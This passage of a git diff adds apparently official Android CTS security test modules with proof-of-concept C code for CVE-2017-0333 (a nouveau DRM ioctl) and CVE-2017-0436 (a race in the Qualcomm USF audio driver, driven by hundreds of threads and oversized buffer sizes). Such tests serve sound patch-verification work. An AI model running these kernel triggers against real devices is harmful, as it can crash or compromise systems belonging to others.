+ uint32_t max_get_set_param_buf_size;
+};
+
+struct us_input_info_type {
+ /* Touch screen dimensions: min & max;for input module */
+ int tsc_x_dim[MIN_MAX_DIM];
+ int tsc_y_dim[MIN_MAX_DIM];
+ int tsc_z_dim[MIN_MAX_DIM];
+ /* Touch screen tilt dimensions: min & max;for input module */
+ int tsc_x_tilt[MIN_MAX_DIM];
+ int tsc_y_tilt[MIN_MAX_DIM];
+ /* Touch screen pressure limits: min & max; for input module */
+ int tsc_pressure[MIN_MAX_DIM];
+ /* The requested buttons bitmap */
+ uint16_t req_buttons_bitmap;
+ /* Bitmap of types of events (USF_X_EVENT), produced by calculator */
+ uint16_t event_types;
+ /* Bitmap of types of events from devs, conflicting with USF */
+ uint16_t conflicting_event_types;
+};
+
+struct us_tx_info_type {
+ /* Common info */
+ struct us_xx_info_type us_xx_info;
+ /* Info specific for TX*/
+ struct us_input_info_type input_info;
+};
+
+struct us_rx_info_type {
+ /* Common info */
+ struct us_xx_info_type us_xx_info;
+ /* Info specific for RX*/
+};
+
+struct us_stream_param_type {
+ /* Id of module */
+ uint32_t module_id;
+ /* Id of parameter */
+ uint32_t param_id;
+ /* Size of memory of the parameter buffer */
+ uint32_t buf_size;
+ /* Pointer to the memory of the parameter buffer */
+ uint8_t __user *pbuf;
+};
+
+#define USF_IOCTL_MAGIC 'U'
+
+#define US_SET_TX_INFO _IOW(USF_IOCTL_MAGIC, 0, struct us_tx_info_type)
+#define US_START_TX _IO(USF_IOCTL_MAGIC, 1)
+#define US_GET_TX_UPDATE \
+ _IOWR(USF_IOCTL_MAGIC, 2, struct us_tx_update_info_type)
+#define US_SET_RX_INFO _IOW(USF_IOCTL_MAGIC, 3, struct us_rx_info_type)
+#define US_SET_RX_UPDATE \
+ _IOWR(USF_IOCTL_MAGIC, 4, struct us_rx_update_info_type)
+#define US_START_RX _IO(USF_IOCTL_MAGIC, 5)
+
+#define US_STOP_TX _IO(USF_IOCTL_MAGIC, 6)
+#define US_STOP_RX _IO(USF_IOCTL_MAGIC, 7)
+
+#define US_SET_TX_STREAM_PARAM \
+ _IOW(USF_IOCTL_MAGIC, 10, struct us_stream_param_type)
+#define US_GET_TX_STREAM_PARAM \
+ _IOWR(USF_IOCTL_MAGIC, 11, struct us_stream_param_type)
+#define US_SET_RX_STREAM_PARAM \
+ _IOW(USF_IOCTL_MAGIC, 12, struct us_stream_param_type)
+#define US_GET_RX_STREAM_PARAM \
+ _IOWR(USF_IOCTL_MAGIC, 13, struct us_stream_param_type)
+
+int fd;
+pthread_t thread_id[THREAD_NUM + 1] = {0};
+int thread_ret[THREAD_NUM] = {0};
+
+static struct us_stream_param_type s_stream_param;
+
+// TX configuration
+static struct us_tx_info_type s_tx_info;
+
+// RX configuration
+static struct us_rx_info_type s_rx_info;
+
+// Valid TX configurations
+static void set_valid_tx_configuration(void);
+
+// Valid RX configurations
+static void set_valid_rx_configuration(void);
+
+// Valid configurations implementations
+static void set_valid_tx_configuration() {
+ const unsigned short FrameHdrSizeBytes = 12;
+
+ typedef struct {
+ unsigned short skipFactor;
+ unsigned short groupFactor;
+ unsigned int frameSize;
+ } TransparentDataTxType;
+ static TransparentDataTxType transparentTxData;
+ transparentTxData.skipFactor = 1;
+ transparentTxData.groupFactor = 2;
+ transparentTxData.frameSize = PortSamplesDataSize;
+
+ s_tx_info.us_xx_info.client_name = "tester";
+ s_tx_info.us_xx_info.dev_id = 0;
+ s_tx_info.us_xx_info.stream_format = USF_RAW_FORMAT;
+ s_tx_info.us_xx_info.sample_rate = 96000;
+ s_tx_info.us_xx_info.buf_num = 8;
+ s_tx_info.us_xx_info.port_cnt = 3;
+ s_tx_info.us_xx_info.port_id[0] = 1;
+ s_tx_info.us_xx_info.port_id[1] = 2;
+ s_tx_info.us_xx_info.port_id[2] = 5;
+ s_tx_info.us_xx_info.bits_per_sample = 16;
+
+ s_tx_info.us_xx_info.params_data_size = sizeof(TransparentDataTxType);
+ s_tx_info.us_xx_info.params_data = (unsigned char *)&transparentTxData;
+
+ unsigned short frame_size = PortSamplesDataSize *
+ (s_tx_info.us_xx_info.bits_per_sample / 8) *
+ s_tx_info.us_xx_info.port_cnt +
+ FrameHdrSizeBytes;
+ s_tx_info.us_xx_info.buf_size = frame_size * transparentTxData.groupFactor;
+
+ s_tx_info.input_info.event_types = USF_ALL_EVENTS;
+ s_tx_info.input_info.tsc_x_dim[0] = 0;
+ s_tx_info.input_info.tsc_x_dim[1] = 480;
+ s_tx_info.input_info.tsc_y_dim[0] = 0;
+ s_tx_info.input_info.tsc_y_dim[1] = 800;
+
+ s_tx_info.input_info.tsc_pressure[0] = 0;
+ s_tx_info.input_info.tsc_pressure[1] = 1;
+
+ // for fail
+ s_tx_info.us_xx_info.max_get_set_param_buf_size = (uint32_t) 100000000000000;
+} // set_valid_tx_configuration
+
+static void set_valid_rx_configuration() {
+ typedef struct {
+ unsigned short frameSize;
+ unsigned short groupFactor;
+ } TransparentDataRxType;
+ static TransparentDataRxType transparentRxData;
+ unsigned short frame_size = 0;
+
+ transparentRxData.frameSize = PortSamplesDataSize;
+ transparentRxData.groupFactor = 1;
+
+ s_rx_info.us_xx_info.client_name = "tester";
+ s_rx_info.us_xx_info.dev_id = 0;
+ s_rx_info.us_xx_info.stream_format = USF_RAW_FORMAT;
+ s_rx_info.us_xx_info.sample_rate = 96000;
+ s_rx_info.us_xx_info.buf_num = 3;
+ s_rx_info.us_xx_info.port_cnt = 1;
+ s_rx_info.us_xx_info.port_id[0] = 1;
+ s_rx_info.us_xx_info.bits_per_sample = 16;
+ s_rx_info.us_xx_info.params_data_size = sizeof(TransparentDataRxType);
+ s_rx_info.us_xx_info.params_data = (unsigned char *)&transparentRxData;
+
+ frame_size = PortSamplesDataSize *
+ (s_rx_info.us_xx_info.bits_per_sample / 8) *
+ s_rx_info.us_xx_info.port_cnt;
+ // group size
+ s_rx_info.us_xx_info.buf_size = frame_size * transparentRxData.groupFactor;
+
+ // for fail
+ s_rx_info.us_xx_info.max_get_set_param_buf_size = (uint32_t) 100000000000000;
+} // set_valid_rx_configuration
+
+static int set_affinity(int num) {
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if (ret == -1) {
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+void *child_ioctl_0(void *no_use) {
+ int ret = 1;
+ set_affinity(1);
+
+ while (1) {
+ ret = ioctl(fd, US_SET_RX_INFO, &s_tx_info);
+ }
+}
+
+int main() {
+ int i, ret;
+
+ s_stream_param.module_id = 10;
+ s_stream_param.param_id = 11;
+ s_stream_param.buf_size = 0x100;
+ /* bind_cpu */
+ set_affinity(0);
+
+ set_valid_tx_configuration();
+ set_valid_rx_configuration();
+
+ /* open dev */
+ fd = open(DEV, O_RDONLY);
+ if (fd == -1) {
+ return 0;
+ }
+
+ /* create thread */
+ for (i = 0; i < THREAD_NUM; i = i + 1) {
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child_ioctl_0, NULL);
+ }
+
+ sleep(3);
+
+ while (1) {
+ ret = ioctl(fd, US_GET_RX_STREAM_PARAM, &s_stream_param);
+ usleep(100);
+ }
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0333/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0333/Android.mk
new file mode 100644
index 0000000..5e19036
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0333/Android.mk
@@ -0,0 +1,37 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License
+
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0333
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0333/local_poc.h b/hostsidetests/security/securityPatch/CVE-2017-0333/local_poc.h
new file mode 100644
index 0000000..1622b39
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0333/local_poc.h
@@ -0,0 +1,269 @@
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOW(nr, type) _IOW(DRM_IOCTL_BASE, nr, type)
+#define DRM_IOWR(nr, type) _IOWR(DRM_IOCTL_BASE, nr, type)
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_NOUVEAU_EVENT_NVIF 0x80000000
+
+/* reserved object handles when using deprecated object APIs - these
+ * are here so that libdrm can allow interoperability with the new
+ * object APIs
+ */
+#define NOUVEAU_ABI16_CLIENT 0xffffffff
+#define NOUVEAU_ABI16_DEVICE 0xdddddddd
+#define NOUVEAU_ABI16_CHAN(n) (0xcccc0000 | (n))
+
+#define NOUVEAU_GEM_DOMAIN_CPU (1 << 0)
+#define NOUVEAU_GEM_DOMAIN_VRAM (1 << 1)
+#define NOUVEAU_GEM_DOMAIN_GART (1 << 2)
+#define NOUVEAU_GEM_DOMAIN_MAPPABLE (1 << 3)
+#define NOUVEAU_GEM_DOMAIN_COHERENT (1 << 4)
+
+#define NOUVEAU_GEM_TILE_COMP 0x00030000 /* nv50-only */
+#define NOUVEAU_GEM_TILE_LAYOUT_MASK 0x0000ff00
+#define NOUVEAU_GEM_TILE_16BPP 0x00000001
+#define NOUVEAU_GEM_TILE_32BPP 0x00000002
+#define NOUVEAU_GEM_TILE_ZETA 0x00000004
+#define NOUVEAU_GEM_TILE_NONCONTIG 0x00000008
+
+struct drm_nouveau_gem_info {
+ uint32_t handle;
+ uint32_t domain;
+ uint64_t size;
+ uint64_t offset;
+ uint64_t map_handle;
+ uint32_t tile_mode;
+ uint32_t tile_flags;
+};
+
+struct drm_nouveau_gem_new {
+ struct drm_nouveau_gem_info info;
+ uint32_t channel_hint;
+ uint32_t align;
+};
+
+struct drm_nouveau_gem_set_tiling {
+ uint32_t handle;
+ uint32_t tile_mode;
+ uint32_t tile_flags;
+};
+
+#define NOUVEAU_GEM_MAX_BUFFERS 1024
+struct drm_nouveau_gem_pushbuf_bo_presumed {
+ uint32_t valid;
+ uint32_t domain;
+ uint64_t offset;
+};
+
+struct drm_nouveau_gem_pushbuf_bo {
+ uint64_t user_priv;
+ uint32_t handle;
+ uint32_t read_domains;
+ uint32_t write_domains;
+ uint32_t valid_domains;
+ struct drm_nouveau_gem_pushbuf_bo_presumed presumed;
+};
+
+#define NOUVEAU_GEM_RELOC_LOW (1 << 0)
+#define NOUVEAU_GEM_RELOC_HIGH (1 << 1)
+#define NOUVEAU_GEM_RELOC_OR (1 << 2)
+#define NOUVEAU_GEM_MAX_RELOCS 1024
+struct drm_nouveau_gem_pushbuf_reloc {
+ uint32_t reloc_bo_index;
+ uint32_t reloc_bo_offset;
+ uint32_t bo_index;
+ uint32_t flags;
+ uint32_t data;
+ uint32_t vor;
+ uint32_t tor;
+};
+
+#define NOUVEAU_GEM_MAX_PUSH 512
+struct drm_nouveau_gem_pushbuf_push {
+ uint32_t bo_index;
+ uint32_t pad;
+ uint64_t offset;
+ uint64_t length;
+};
+
+struct drm_nouveau_gem_pushbuf {
+ uint32_t channel;
+ uint32_t nr_buffers;
+ uint64_t buffers;
+ uint32_t nr_relocs;
+ uint32_t nr_push;
+ uint64_t relocs;
+ uint64_t push;
+ uint32_t suffix0;
+ uint32_t suffix1;
+ uint64_t vram_available;
+ uint64_t gart_available;
+};
+
+#define NOUVEAU_GEM_PUSHBUF_2_FENCE_WAIT 0x00000001
+#define NOUVEAU_GEM_PUSHBUF_2_FENCE_EMIT 0x00000002
+struct drm_nouveau_gem_pushbuf_2 {
+ uint32_t channel;
+ uint32_t flags;
+ uint32_t nr_push;
+ uint32_t nr_buffers;
+ int32_t fence; /* in/out, depends on flags */
+ uint32_t pad;
+ uint64_t push; /* in raw hw format */
+ uint64_t buffers; /* ptr to drm_nouveau_gem_pushbuf_bo */
+ uint64_t vram_available;
+ uint64_t gart_available;
+};
+
+#define NOUVEAU_GEM_CPU_PREP_NOWAIT 0x00000001
+#define NOUVEAU_GEM_CPU_PREP_WRITE 0x00000004
+struct drm_nouveau_gem_cpu_prep {
+ uint32_t handle;
+ uint32_t flags;
+};
+
+struct drm_nouveau_gem_cpu_fini {
+ uint32_t handle;
+};
+
+struct drm_nouveau_gem_as_alloc {
+ uint64_t pages; /* in, page length */
+ uint32_t page_size; /* in, byte page size */
+#define NOUVEAU_GEM_AS_SPARSE 0x1
+ uint32_t flags;
+ uint64_t align; /* in, requested alignment in bytes */
+ uint64_t address; /* in/out, non-zero for fixed address allocation */
+};
+
+struct drm_nouveau_gem_as_free {
+ uint64_t address; /* in, byte address */
+};
+
+#define NOUVEAU_GEM_CHANNEL_FIFO_ERROR_IDLE_TIMEOUT 8
+#define NOUVEAU_GEM_CHANNEL_GR_ERROR_SW_NOTIFY 13
+#define NOUVEAU_GEM_CHANNEL_FIFO_ERROR_MMU_ERR_FLT 31
+#define NOUVEAU_GEM_CHANNEL_PBDMA_ERROR 32
+struct drm_nouveau_gem_set_error_notifier {
+ uint32_t channel;
+ uint32_t buffer;
+ uint32_t offset; /* bytes, u32-aligned */
+};
+
+struct drm_nouveau_gem_map {
+ uint32_t handle;
+ uint32_t domain;
+ uint64_t offset;
+ uint64_t delta;
+ uint64_t length;
+ uint32_t tile_mode;
+ uint32_t tile_flags;
+};
+
+struct drm_nouveau_gem_unmap {
+ uint32_t handle;
+ uint32_t pad;
+ uint64_t offset;
+ uint64_t delta;
+ uint64_t length;
+};
+
+struct nvif_ioctl_v0 {
+ __u8 version;
+#define NVIF_IOCTL_V0_OWNER_NVIF 0x00
+#define NVIF_IOCTL_V0_OWNER_ANY 0xff
+ __u8 owner;
+#define NVIF_IOCTL_V0_NOP 0x00
+#define NVIF_IOCTL_V0_SCLASS 0x01
+#define NVIF_IOCTL_V0_NEW 0x02
+#define NVIF_IOCTL_V0_DEL 0x03
+#define NVIF_IOCTL_V0_MTHD 0x04
+#define NVIF_IOCTL_V0_RD 0x05
+#define NVIF_IOCTL_V0_WR 0x06
+#define NVIF_IOCTL_V0_MAP 0x07
+#define NVIF_IOCTL_V0_UNMAP 0x08
+#define NVIF_IOCTL_V0_NTFY_NEW 0x09
+#define NVIF_IOCTL_V0_NTFY_DEL 0x0a
+#define NVIF_IOCTL_V0_NTFY_GET 0x0b
+#define NVIF_IOCTL_V0_NTFY_PUT 0x0c
+ __u8 type;
+ __u8 path_nr;
+#define NVIF_IOCTL_V0_ROUTE_NVIF 0x00
+#define NVIF_IOCTL_V0_ROUTE_HIDDEN 0xff
+ __u8 pad04[3];
+ __u8 route;
+ __u64 token;
+ __u32 path[8]; /* in reverse */
+ __u8 data[]; /* ioctl data (below) */
+};
+
+#define DRM_NOUVEAU_GETPARAM 0x00 /* deprecated */
+#define DRM_NOUVEAU_SETPARAM 0x01 /* deprecated */
+#define DRM_NOUVEAU_CHANNEL_ALLOC 0x02 /* deprecated */
+#define DRM_NOUVEAU_CHANNEL_FREE 0x03 /* deprecated */
+#define DRM_NOUVEAU_GROBJ_ALLOC 0x04 /* deprecated */
+#define DRM_NOUVEAU_NOTIFIEROBJ_ALLOC 0x05 /* deprecated */
+#define DRM_NOUVEAU_GPUOBJ_FREE 0x06 /* deprecated */
+#define DRM_NOUVEAU_NVIF 0x07
+#define DRM_NOUVEAU_GEM_NEW 0x40
+#define DRM_NOUVEAU_GEM_PUSHBUF 0x41
+#define DRM_NOUVEAU_GEM_CPU_PREP 0x42
+#define DRM_NOUVEAU_GEM_CPU_FINI 0x43
+#define DRM_NOUVEAU_GEM_INFO 0x44
+/*
+ * range (0x50+DRM_COMMAND_BASE)..DRM_COMMAND_END is reserved for staging,
+ * unstable ioctls
+ */
+#define DRM_NOUVEAU_STAGING_IOCTL 0x50
+#define DRM_NOUVEAU_GEM_SET_TILING (DRM_NOUVEAU_STAGING_IOCTL + 0x0)
+#define DRM_NOUVEAU_GEM_PUSHBUF_2 (DRM_NOUVEAU_STAGING_IOCTL + 0x1)
+#define DRM_NOUVEAU_GEM_SET_INFO (DRM_NOUVEAU_STAGING_IOCTL + 0x2)
+#define DRM_NOUVEAU_GEM_AS_ALLOC (DRM_NOUVEAU_STAGING_IOCTL + 0x3)
+#define DRM_NOUVEAU_GEM_AS_FREE (DRM_NOUVEAU_STAGING_IOCTL + 0x4)
+#define DRM_NOUVEAU_GEM_SET_ERROR_NOTIFIER (DRM_NOUVEAU_STAGING_IOCTL + 0x5)
+#define DRM_NOUVEAU_GEM_MAP (DRM_NOUVEAU_STAGING_IOCTL + 0x6)
+#define DRM_NOUVEAU_GEM_UNMAP (DRM_NOUVEAU_STAGING_IOCTL + 0x7)
+
+#define DRM_IOCTL_NOUVEAU_GEM_NEW \
+ DRM_IOWR(DRM_COMMAND_BASE + DRM_NOUVEAU_GEM_NEW, struct drm_nouveau_gem_new)
+#define DRM_IOCTL_NOUVEAU_GEM_PUSHBUF \
+ DRM_IOWR(DRM_COMMAND_BASE + DRM_NOUVEAU_GEM_PUSHBUF, \
+ struct drm_nouveau_gem_pushbuf)
+#define DRM_IOCTL_NOUVEAU_GEM_CPU_PREP \
+ DRM_IOW(DRM_COMMAND_BASE + DRM_NOUVEAU_GEM_CPU_PREP, \
+ struct drm_nouveau_gem_cpu_prep)
+#define DRM_IOCTL_NOUVEAU_GEM_CPU_FINI \
+ DRM_IOW(DRM_COMMAND_BASE + DRM_NOUVEAU_GEM_CPU_FINI, \
+ struct drm_nouveau_gem_cpu_fini)
+#define DRM_IOCTL_NOUVEAU_GEM_INFO \
+ DRM_IOWR(DRM_COMMAND_BASE + DRM_NOUVEAU_GEM_INFO, struct drm_nouveau_gem_info)
+#define DRM_IOCTL_NOUVEAU_GEM_SET_TILING \
+ DRM_IOWR(DRM_COMMAND_BASE + DRM_NOUVEAU_GEM_SET_TILING, \
+ struct drm_nouveau_gem_set_tiling)
+#define DRM_IOCTL_NOUVEAU_GEM_PUSHBUF_2 \
+ DRM_IOWR(DRM_COMMAND_BASE + DRM_NOUVEAU_GEM_PUSHBUF_2, \
+ struct drm_nouveau_gem_pushbuf_2)
+#define DRM_IOCTL_NOUVEAU_GEM_SET_INFO \
+ DRM_IOWR(DRM_COMMAND_BASE + DRM_NOUVEAU_GEM_SET_INFO, \
+ struct drm_nouveau_gem_info)
+#define DRM_IOCTL_NOUVEAU_GEM_AS_ALLOC \
+ DRM_IOWR(DRM_COMMAND_BASE + DRM_NOUVEAU_GEM_AS_ALLOC, \
+ struct drm_nouveau_gem_as_alloc)
+#define DRM_IOCTL_NOUVEAU_GEM_AS_FREE \
+ DRM_IOWR(DRM_COMMAND_BASE + DRM_NOUVEAU_GEM_AS_FREE, \
+ struct drm_nouveau_gem_as_free)
+#define DRM_IOCTL_NOUVEAU_GEM_SET_ERROR_NOTIFIER \
+ DRM_IOWR(DRM_COMMAND_BASE + DRM_NOUVEAU_GEM_SET_ERROR_NOTIFIER, \
+ struct drm_nouveau_gem_set_error_notifier)
+#define DRM_IOCTL_NOUVEAU_GEM_MAP \
+ DRM_IOWR(DRM_COMMAND_BASE + DRM_NOUVEAU_GEM_MAP, struct drm_nouveau_gem_map)
+#define DRM_IOCTL_NOUVEAU_GEM_UNMAP \
+ DRM_IOWR(DRM_COMMAND_BASE + DRM_NOUVEAU_GEM_UNMAP, \
+ struct drm_nouveau_gem_unmap)
+
+#define DRM_IOCTL_NOUVEAU_NVIF \
+ DRM_IOWR(DRM_COMMAND_BASE + DRM_NOUVEAU_NVIF, struct nvif_ioctl_v0)
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0333/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0333/poc.c
new file mode 100644
index 0000000..d222a72
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0333/poc.c
@@ -0,0 +1,56 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <sched.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#include "local_poc.h"
+
+#define DEV "/dev/dri/renderD128"
+
+int dev_fd;
+
+enum nouveau_drm_object_route {
+ NVDRM_OBJECT_NVIF = 0,
+ NVDRM_OBJECT_USIF,
+ NVDRM_OBJECT_ABI16,
+};
+
+struct nvif_ioctl_v0 s_nvif;
+
+int main() {
+ int ret;
+
+ dev_fd = open(DEV, O_RDONLY);
+
+ if (dev_fd == -1) {
+ return 0;
+ }
+
+ s_nvif.type = 0x3;
+
+ ret = ioctl(dev_fd, DRM_IOCTL_NOUVEAU_NVIF, &s_nvif);
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0436/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0436/Android.mk
new file mode 100644
index 0000000..68bfd79
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0436/Android.mk
@@ -0,0 +1,37 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License
+
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0436
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0436/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0436/poc.c
new file mode 100644
index 0000000..192a06e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0436/poc.c
@@ -0,0 +1,282 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#define THREAD_NUM 300
+#define DEV "/dev/usf1"
+
+/* min, max array dimension */
+#define MIN_MAX_DIM 2
+
+#define USF_MAX_PORT_NUM 8
+
+static const unsigned short PortSamplesDataSize = 768;
+
+/* Encoder (TX), decoder (RX) supported US data formats */
+#define USF_POINT_EPOS_FORMAT 0
+#define USF_RAW_FORMAT 1
+
+/* Indexes of event types, produced by the calculators */
+#define USF_TSC_EVENT_IND 0
+#define USF_TSC_PTR_EVENT_IND 1
+#define USF_MOUSE_EVENT_IND 2
+#define USF_KEYBOARD_EVENT_IND 3
+#define USF_TSC_EXT_EVENT_IND 4
+#define USF_MAX_EVENT_IND 5
+
+/* Types of events, produced by the calculators */
+#define USF_NO_EVENT 0
+#define USF_TSC_EVENT (1 << USF_TSC_EVENT_IND)
+#define USF_TSC_PTR_EVENT (1 << USF_TSC_PTR_EVENT_IND)
+#define USF_MOUSE_EVENT (1 << USF_MOUSE_EVENT_IND)
+#define USF_KEYBOARD_EVENT (1 << USF_KEYBOARD_EVENT_IND)
+#define USF_TSC_EXT_EVENT (1 << USF_TSC_EXT_EVENT_IND)
+#define USF_ALL_EVENTS \
+ (USF_TSC_EVENT | USF_TSC_PTR_EVENT | USF_MOUSE_EVENT | USF_KEYBOARD_EVENT | \
+ USF_TSC_EXT_EVENT)
+void *child_ioctl_0(void *no_use);
+void *child_ioctl_1(void *no_use);
+
+/* Info structure common for TX and RX */
+struct us_xx_info_type {
+ /* Input: general info */
+ /* Name of the client - event calculator */
+ const char __user *client_name;
+ /* Selected device identification, accepted in the kernel's CAD */
+ uint32_t dev_id;
+ /* 0 - point_epos type; (e.g. 1 - gr_mmrd) */
+ uint32_t stream_format;
+ /* Required sample rate in Hz */
+ uint32_t sample_rate;
+ /* Size of a buffer (bytes) for US data transfer between the module and USF */
+ uint32_t buf_size;
+ /* Number of the buffers for the US data transfer */
+ uint16_t buf_num;
+ /* Number of the microphones (TX) or speakers(RX) */
+ uint16_t port_cnt;
+ /* Microphones(TX) or speakers(RX) indexes in their enumeration */
+ uint8_t port_id[USF_MAX_PORT_NUM];
+ /* Bits per sample 16 or 32 */
+ uint16_t bits_per_sample;
+ /* Input: Transparent info for encoder in the LPASS */
+ /* Parameters data size in bytes */
+ uint16_t params_data_size;
+ /* Pointer to the parameters */
+ uint8_t __user *params_data;
+ /* Max size of buffer for get and set parameter */
+ uint32_t max_get_set_param_buf_size;
+};
+
+struct us_input_info_type {
+ /* Touch screen dimensions: min & max;for input module */
+ int tsc_x_dim[MIN_MAX_DIM];
+ int tsc_y_dim[MIN_MAX_DIM];
+ int tsc_z_dim[MIN_MAX_DIM];
+ /* Touch screen tilt dimensions: min & max;for input module */
+ int tsc_x_tilt[MIN_MAX_DIM];
+ int tsc_y_tilt[MIN_MAX_DIM];
+ /* Touch screen pressure limits: min & max; for input module */
+ int tsc_pressure[MIN_MAX_DIM];
+ /* The requested buttons bitmap */
+ uint16_t req_buttons_bitmap;
+ /* Bitmap of types of events (USF_X_EVENT), produced by calculator */
+ uint16_t event_types;
+ /* Bitmap of types of events from devs, conflicting with USF */
+ uint16_t conflicting_event_types;
+};
+
+struct us_tx_info_type {
+ /* Common info */
+ struct us_xx_info_type us_xx_info;
+ /* Info specific for TX*/
+ struct us_input_info_type input_info;
+};
+
+struct us_rx_info_type {
+ /* Common info */
+ struct us_xx_info_type us_xx_info;
+ /* Info specific for RX*/
+};
+
+struct us_stream_param_type {
+ /* Id of module */
+ uint32_t module_id;
+ /* Id of parameter */
+ uint32_t param_id;
+ /* Size of memory of the parameter buffer */
+ uint32_t buf_size;
+ /* Pointer to the memory of the parameter buffer */
+ uint8_t __user *pbuf;
+};
+
+#define USF_IOCTL_MAGIC 'U'
+
+#define US_SET_TX_INFO _IOW(USF_IOCTL_MAGIC, 0, struct us_tx_info_type)
+#define US_START_TX _IO(USF_IOCTL_MAGIC, 1)
+#define US_GET_TX_UPDATE \
+ _IOWR(USF_IOCTL_MAGIC, 2, struct us_tx_update_info_type)
